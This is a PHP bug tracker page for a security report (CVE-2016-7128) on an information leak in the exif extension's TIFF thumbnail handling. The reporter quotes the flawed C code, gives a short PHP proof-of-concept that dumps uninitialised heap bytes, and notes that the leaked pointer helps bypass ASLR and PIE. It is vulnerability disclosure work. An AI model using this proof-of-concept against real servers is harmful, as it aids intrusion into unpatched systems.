|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-08-08 07:51 UTC] [email protected]
-PHP Version: 7.0.8
+PHP Version: 5.6.24
-Assigned To:
+Assigned To: stas
[2016-08-08 07:51 UTC] [email protected]
[2016-08-08 07:59 UTC] nguyenvuhoang199321 at gmail dot com
[2016-08-15 06:04 UTC] [email protected]
-CVE-ID:
+CVE-ID: needed
[2016-08-17 05:51 UTC] [email protected]
-Type: Security
+Type: Bug
[2016-08-17 05:51 UTC] [email protected]
-Type: Bug
+Type: Security
-Private report: No
+Private report: Yes
[2016-08-17 06:40 UTC] [email protected]
-Status: Assigned
+Status: Closed
[2016-08-17 06:40 UTC] [email protected]
[2016-08-17 08:23 UTC] [email protected]
[2016-08-17 08:23 UTC] [email protected]
[2016-08-17 09:15 UTC] [email protected]
[2016-08-17 09:15 UTC] [email protected]
[2016-08-17 12:04 UTC] [email protected]
[2016-08-17 19:10 UTC] [email protected]
[2016-08-18 11:15 UTC] [email protected]
[2016-09-05 15:28 UTC] [email protected]
-CVE-ID: needed
+CVE-ID: 2016-7128
[2016-10-10 11:17 UTC] [email protected]
[2016-10-17 10:09 UTC] [email protected]
[2016-10-17 10:09 UTC] [email protected]
[2017-01-12 09:12 UTC] [email protected]
|
|||||||||||||||||||||||||||
Copyright © 2001-2026 The PHP GroupAll rights reserved. |
Last updated: Tue Mar 17 11:00:01 2026 UTC |
Description: ------------ I found some vulnerable code that leads to the memory leak in exif_process_IFD_in_TIFF. Let take look at code chunk : ``` if (!ImageInfo->Thumbnail.data && ImageInfo->Thumbnail.offset && ImageInfo->Thumbnail.size && ImageInfo->read_thumbnail) { ImageInfo->Thumbnail.data = safe_emalloc(ImageInfo->Thumbnail.size, 1, 0); php_stream_seek(ImageInfo->infile, ImageInfo->Thumbnail.offset, SEEK_SET); fgot = php_stream_read(ImageInfo->infile, ImageInfo->Thumbnail.data, ImageInfo->Thumbnail.size); if (fgot < ImageInfo->Thumbnail.size) { EXIF_ERRLOG_THUMBEOF(ImageInfo) } exif_thumbnail_build(ImageInfo); } ``` Because lack of checking ImageInfo->Thumbnail.offset if an attack set ImageInfo->Thumbnail.offset larger than ImageInfo->FileSize then *php_stream_read* return 0 to fgot, because EXIF_ERRLOG_THUMBEOF was defined as : ``` #define EXIF_ERRLOG_THUMBEOF(ImageInfo) exif_error_docref(NULL EXIFERR_CC, ImageInfo, E_WARNING, "%s", EXIF_ERROR_THUMBEOF); ``` As you can see there is no exit after this error is output. After that exif_thumbnail_build(ImageInfo) is called. Because this thumbnail I applied is IMAGE_FILETYPE_JPEG so exif_thumbnail_build will return without error. Finally ImageInfo->Thumbnail.data is no fill by user data that lead to information leak like below, an attacker can leak address and then use it to bypass some protection such as PIE, ASLR,... Here the tiff file : https://drive.google.com/open?id=0B0D1DYQpkA9UVGE5QlJaNnIxb1E Affect : Linux, Mac Os X Test script: --------------- <?php $exif = exif_read_data('exif/gen.tiff',0,0,true); var_dump($exif); $thumb = $exif['THUMBNAIL']['THUMBNAIL']; echo bin2hex($thumb); ?> Actual result: -------------- $./php exif.php Warning: exif_read_data(gen.tiff): Thumbnail goes IFD boundary or end of file reached in /vagrant_extend/audit/exif.php on line 2 Warning: exif_read_data(gen.tiff): Error in TIFF: filesize(x04E2) less than start of IFD dir(x829A0004) in /vagrant_extend/audit/exif.php on line 2 array(11) { ["FileName"]=> string(8) "gen.tiff" ["FileDateTime"]=> int(1468986539) ["FileSize"]=> int(1250) ["FileType"]=> int(7) ["MimeType"]=> string(10) "image/tiff" ["SectionsFound"]=> string(30) "ANY_TAG, IFD0, THUMBNAIL, EXIF" ["COMPUTED"]=> array(10) { ["html"]=> string(24) "width="128" height="132"" ["Height"]=> int(132) ["Width"]=> int(128) ["IsColor"]=> int(0) ["ByteOrderMotorola"]=> int(0) ["ApertureFNumber"]=> string(5) "f/1.0" ["Thumbnail.FileType"]=> int(2) ["Thumbnail.MimeType"]=> string(10) "image/jpeg" ["Thumbnail.Height"]=> int(132) ["Thumbnail.Width"]=> int(128) } ["XResolution"]=> string(21) "1414812756/1414812756" ["THUMBNAIL"]=> array(5) { ["ImageWidth"]=> int(128) ["ImageLength"]=> int(132) ["JPEGInterchangeFormat"]=> int(1280) ["JPEGInterchangeFormatLength"]=> int(200) ["THUMBNAIL"]=> string(200) "" # leak leak } ["ExposureTime"]=> string(21) "1414812756/1414812756" ["FNumber"]=> string(21) "1414812756/1414812756" } 00c2a7081e7f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 => leak leak (00c2a7081e7f => 0x7f1e08a7c200)